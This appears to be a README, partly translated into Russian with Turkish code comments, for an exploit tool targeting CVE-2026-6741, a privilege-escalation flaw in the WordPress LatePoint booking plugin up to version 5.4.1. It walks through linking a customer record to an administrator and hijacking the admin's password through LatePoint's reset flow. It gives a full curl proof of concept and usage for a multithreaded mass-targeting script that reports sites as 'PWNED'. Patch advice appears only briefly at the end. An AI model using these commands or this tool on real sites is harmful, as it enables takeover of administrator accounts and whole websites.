
CVE-2026-6741 — это аутентифицированная (Agent+) уязвимость повышения привилегий с оценкой CVSS 8.8 (High) в плагине LatePoint – Calendar Booking Plugin.
CVE-2026-6741 — это уязвимость повышения привилегий (CVSS 8.8, High) с аутентификацией (Agent+) в плагине LatePoint – Calendar Booking Plugin.
Плагин: LatePoint – плагин календарного бронирования для встреч и событий (
latepoint) CVE ID: CVE-2026-6741 Оценка CVSS: 8.8 (High) Вектор CVSS:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HТип уязвимости: Аутентифицированное (Agent+) повышение привилегий → захват администратора Затронутые версии: <= 5.4.1 Исправленная версия: 5.4.2 Дата публикации: 27 апреля 2026 Исследователи: skyv3il (AI SAFE), Chirita Catalin-Andrei / CC99IE (UVT-CTF), AmonRa — Wordfence
Аутентифицированный злоумышленник с ролью latepoint_agent может связать любую запись customer LatePoint с учётной записью администратора WordPress, а затем, используя собственный процесс сброса пароля LatePoint, изменить пароль администратора.
Это приводит к полному захвату сайта.
LatePoint 5.3.0 добавил поддержку Abilities API, появившейся в WordPress 6.9+. Этот API позволяет плагинам регистрировать классы «ability», вызываемые через REST API:
// latepoint.php (5.4.1, line 907)
if ( function_exists( 'wp_register_ability' ) ) {
include_once LATEPOINT_ABSPATH . 'lib/abilities/class-latepoint-abilities.php';
}
// lib/abilities/customers/connect-customer-to-wp-user.php — line 12
protected function configure(): void {
$this->id = 'latepoint/connect-customer-to-wp-user';
$this->label = __( 'Connect customer to WP user', 'latepoint' );
$this->permission = 'customer__edit'; // ← tek kontrol: bu capability
}
Роль агента по умолчанию имеет возможность customer__edit:
// lib/helpers/roles_helper.php — line 401
public static function get_default_capabilities_list_for_agent_role() {
$capabilities = [
...
'customer__edit', // ← agent bu yetkiye sahip
...
];
}
// connect-customer-to-wp-user.php — lines 39–60
public function execute( array $args ) {
$customer = new OsCustomerModel( (int) $args['customer_id'] );
$wp_user_id = (int) $args['wp_user_id'];
if ( ! get_userdata( $wp_user_id ) ) {
// Sadece kullanıcının var olup olmadığı kontrol ediliyor
// EKSIK: Hedef kullanıcının rolü kontrol edilmiyor
return new WP_Error( 'wp_user_not_found', ... );
}
$customer->wordpress_user_id = $wp_user_id; // ← herhangi bir WP user'a bağla
$customer->save();
return $this->serialize_customer( ... );
}
// lib/models/customer_model.php — line 315
public function update_password( $password ) {
if ( OsAuthHelper::can_wp_users_login_as_customers()
&& $this->wordpress_user_id ) {
wp_set_password( $password, $this->wordpress_user_id );
// ↑ wordpress_user_id artık admin ID'si → admin şifresi değişir
}
}
// LatePointAbstractAbility — check_permission()
public function check_permission(): bool {
return OsRolesHelper::can_user( $this->permission );
// Sadece ÇAĞIRANIN yetkisini kontrol eder
// HEDEF kullanıcının rolünü kontrol etmez
}
latepoint_agent hesabı
│
▼
1. Agent olarak WP'ye giriş yap → REST nonce al
│
▼
2. Hedef admin WordPress user ID'sini tespit et
(wp-json/wp/v2/users veya ID=1)
│
▼
3. POST /wp-json/wp/v2/abilities/latepoint/connect-customer-to-wp-user
{ "customer_id": 5, "wp_user_id": 1 }
→ Rol kontrolü yok → Başarılı
│
▼
4. LatePoint forgot_password → customer emailine reset token gönder
│
▼
5. Token ile change_password → update_password() çağrılır
→ wp_set_password("Hacked!", 1)
→ Admin şifresi değişti
│
▼
6. Yeni şifreyle admin olarak giriş → Tam site kontrolü ✓
⚠️ Отказ от ответственности: Этот PoC предоставлен только в образовательных целях и для защитных исследований безопасности.
Предварительные условия:
latepoint_agentWP_URL="https://target.example.com"
AGENT_USER="agent_user"
AGENT_PASS="agent_password"
# Cookie tabanlı oturum aç
curl -c cookies.txt -b cookies.txt -s -X POST "$WP_URL/wp-login.php" \
-d "log=$AGENT_USER&pwd=$AGENT_PASS&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
-H "Cookie: wordpress_test_cookie=WP+Cookie+check"
# REST nonce al
NONCE=$(curl -s -b cookies.txt \
"$WP_URL/wp-admin/admin-ajax.php?action=rest-nonce")
echo "Nonce: $NONCE"
# REST API ile admin kullanıcıları listele
curl -s "$WP_URL/wp-json/wp/v2/users?roles=administrator" \
-H "X-WP-Nonce: $NONCE" | python3 -m json.tool
ADMIN_WP_USER_ID=1 # Genellikle ID=1
CUSTOMER_ID=5 # Kontrol ettiğin LatePoint customer ID
curl -s -b cookies.txt -X POST \
"$WP_URL/wp-json/wp/v2/abilities/latepoint/connect-customer-to-wp-user" \
-H "Content-Type: application/json" \
-H "X-WP-Nonce: $NONCE" \
-d "{\"customer_id\": $CUSTOMER_ID, \"wp_user_id\": $ADMIN_WP_USER_ID}"
Ожидаемый ответ:
{
"id": 5,
"wp_user_id": 1,
"email": "[email protected]"
}
CUSTOMER_EMAIL="[email protected]"
curl -s -X POST \
"$WP_URL/?latepoint_route=customer_cabinet%2Fforgot_password" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "password_reset_email=$CUSTOMER_EMAIL"
LatePoint отправляет на адрес $CUSTOMER_EMAIL письмо для сброса пароля, содержащее токен account_nonce.
RESET_TOKEN="<emailden_alinan_token>"
NEW_PASSWORD="Attacker_Password123!"
curl -s -X POST \
"$WP_URL/?latepoint_route=customer_cabinet%2Fchange_password" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "password_reset_token=$RESET_TOKEN&password=$NEW_PASSWORD&password_confirmation=$NEW_PASSWORD"
Этот вызов запускает цепочку update_password() → wp_set_password($NEW_PASSWORD, 1). Пароль администратора изменён.
curl -c admin_cookies.txt -b admin_cookies.txt -s -X POST \
"$WP_URL/wp-login.php" \
-d "log=admin&pwd=$NEW_PASSWORD&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
-H "Cookie: wordpress_test_cookie=WP+Cookie+check"
# wp-admin erişimi
curl -b admin_cookies.txt "$WP_URL/wp-admin/user-new.php"
# Beklenen: 200 OK (wp-login.php'ye yönlendirme değil)
# REST API ile rol doğrulama
ADMIN_NONCE=$(curl -s -b admin_cookies.txt \
"$WP_URL/wp-admin/admin-ajax.php?action=rest-nonce")
curl -s "$WP_URL/wp-json/wp/v2/users/me" \
-H "X-WP-Nonce: $ADMIN_NONCE" | python3 -m json.tool
# Beklenen: "roles": ["administrator"]
git clone https://github.com/kullanici/cve-2026-6741-scanner
cd cve-2026-6741-scanner
pip install -r requirements.txt
requirements.txt
requests
python latepoint_privesc.py -u http://hedef.com \
--agent-user agent1 --agent-pass Pass123!
python latepoint_privesc.py -u http://hedef.com \
--agent-user agent1 --agent-pass Pass123! \
--admin-id 1 \
--customer-id 5 \
--customer-email [email protected]
python latepoint_privesc.py -u http://hedef.com \
--agent-user agent1 --agent-pass Pass123! \
--admin-id 1 \
--customer-id 5 \
--customer-email [email protected] \
--reset-token abc123xyz \
--new-password Hacked_2026!
python latepoint_privesc.py -l targets.txt -t 10 \
--agent-user agent1 --agent-pass Pass123! \
-o sonuclar.txt
python latepoint_privesc.py -u http://hedef.com \
--agent-user agent1 --agent-pass Pass123! \
--proxy http://127.0.0.1:8080
| Параметр | Описание |
|---|---|
--agent-user | Имя пользователя агента (обязательно) |
--agent-pass | Пароль агента (обязательно) |
| Параметр | Описание | По умолчанию |
|---|---|---|
| Параметр | Описание | По умолчанию |
|---|---|---|
--reset-token | Reset-токен, полученный по email | — |
--new-password | Новый пароль администратора | Pwned_CVE2026_6741! |
[*] Hedef : http://hedef.com
[*] Agent : agent1
[*] Admin ID : otomatik tespit
[*] Customer ID : otomatik tespit
[*] Reset Token : email bekleniyor
[*] Yeni Şifre : Pwned_CVE2026_6741!
[→] http://hedef.com Adım 1/6: Agent girişi...
[→] http://hedef.com Adım 2/6: Admin user ID tespiti...
[→] http://hedef.com Adım 3/6: Customer ID tespiti...
[→] http://hedef.com Adım 4/6: Customer #5 → Admin #1 bağlanıyor...
[→] http://hedef.com Adım 5/6: Şifre sıfırlama başlatılıyor...
[→] http://hedef.com Adım 6/6: Şifre değiştiriliyor (manuel token)...
════════════════════════════════════════════════════════════
[★ PWNED ] http://hedef.com
Sürüm : 5.4.1
Admin ID : 1
Customer : #5 <[email protected]>
Kullanıcı : admin roles=['administrator']
════════════════════════════════════════════════════════════
[+] Kaydedildi → privesc_results.txt
┌─────────────────────────────────────────────────────────┐
│ AŞAMA 1 — Bağla + Reset Emaili Gönder │
│ │
│ python latepoint_privesc.py -u http://hedef.com \ │
│ --agent-user agent1 --agent-pass Pass123! \ │
│ --customer-id 5 --customer-email [email protected] │
│ │
│ → Çıktı: "Reset emaili gönderildi — token bekleniyor" │
└─────────────────────────┬───────────────────────────────┘
│
Email'den token al
│
┌─────────────────────────▼───────────────────────────────┐
│ AŞAMA 2 — Token ile Şifreyi Değiştir │
│ │
│ python latepoint_privesc.py -u http://hedef.com \ │
│ --agent-user agent1 --agent-pass Pass123! \ │
│ --customer-id 5 --customer-email [email protected] \ │
│ --reset-token abc123xyz \ │
│ --new-password Hacked_2026! │
│ │
│ → Çıktı: ★ PWNED — roles=['administrator'] │
└─────────────────────────────────────────────────────────┘
Пример безопасного execute():
// Güvensiz (mevcut — 5.4.1)
if ( ! get_userdata( $wp_user_id ) ) {
return new WP_Error( 'wp_user_not_found', ... );
}
// Güvenli (önerilen — 5.4.2+)
$target_user = get_userdata( $wp_user_id );
if ( ! $target_user ) {
return new WP_Error( 'wp_user_not_found', ... );
}
// Hedef kullanıcının rolünü kontrol et
if ( in_array( 'administrator', (array) $target_user->roles ) ) {
return new WP_Error( 'forbidden', 'Cannot link customer to administrator.' );
}
cve-2026-6741-scanner/
├── latepoint_privesc.py # Ana tarayıcı
├── requirements.txt # Bağımlılıklar
└── README.md # Bu dosya
Этот инструмент и PoC предназначены только для использования на авторизованных системах, в образовательных целях и в рамках тестирования на проникновение. Использование на системах без разрешения является преступлением согласно статьям 243–245 Уголовного кодекса Турции и международным законам о киберпреступности. Разработчик не несёт никакой юридической ответственности за неправомерное использование инструмента.
MIT License — Только для образовательных и исследовательских целей.
| Поле | Значение |
|---|
| Название плагина | LatePoint – Calendar Booking Plugin |
| Слаг плагина | latepoint |
| CVE ID | CVE-2026-6741 |
| Оценка CVSS | 8.8 (High) |
| Тип уязвимости | Аутентифицированное (Agent+) повышение привилегий |
| Затронутая версия | <= 5.4.1 |
| Исправленная версия | 5.4.2 |
| Требование | роль latepoint_agent, WordPress 6.9+ |
| Параметр | Сокращение | Описание | По умолчанию |
|---|
--url | -u | URL одиночной цели | — |
--list | -l | Файл со списком целей | — |
--threads | -t | Количество потоков | 5 |
--output | -o | Выходной файл | privesc_results.txt |
--proxy | — | URL прокси | — |
--timeout | — | Таймаут запроса (сек) | 10 |
--force | — | Продолжать, даже если обнаружение Abilities API не удалось | False |
--admin-id| ID целевого административного пользователя WordPress |
| автоматическое определение |
--customer-id | ID контролируемой записи customer LatePoint | автоматическое определение |
--customer-email | Адрес email customer LatePoint | email агента |
| Статус | Описание |
|---|
★ PWNED | Пароль администратора изменён, выполнен вход |
~ RESET_SENT | Письмо для сброса отправлено — ожидается токен |
~ PWD_CHANGE | Пароль изменён — проверьте вход администратора вручную |
- LINK_FAIL | Не удалось связать Customer-Admin |
- LOGIN_FAIL | Не удалось выполнить вход агента |
- NO_PLUGIN | LatePoint не установлен |
- NO_ABILITY | Abilities API отключён (требуется WP 6.9+) |
~ NO_CUST | Customer ID не найден — укажите вручную |
~ UNREACH | Цель недоступна |
| Мера | Реализация |
|---|
| Обновление плагина | Обновите LatePoint до версии 5.4.2+ |
| Добавьте проверку роли | Проверяйте роль целевого пользователя внутри execute() |
| Ограничьте Abilities API | Удалите возможность connect-customer-to-wp-user у роли агента |
| Защита сброса пароля | Отключите процесс сброса LatePoint для учётных записей администратора |
| Аудит Abilities WordPress 6.9 | Регулярно просматривайте зарегистрированные ability |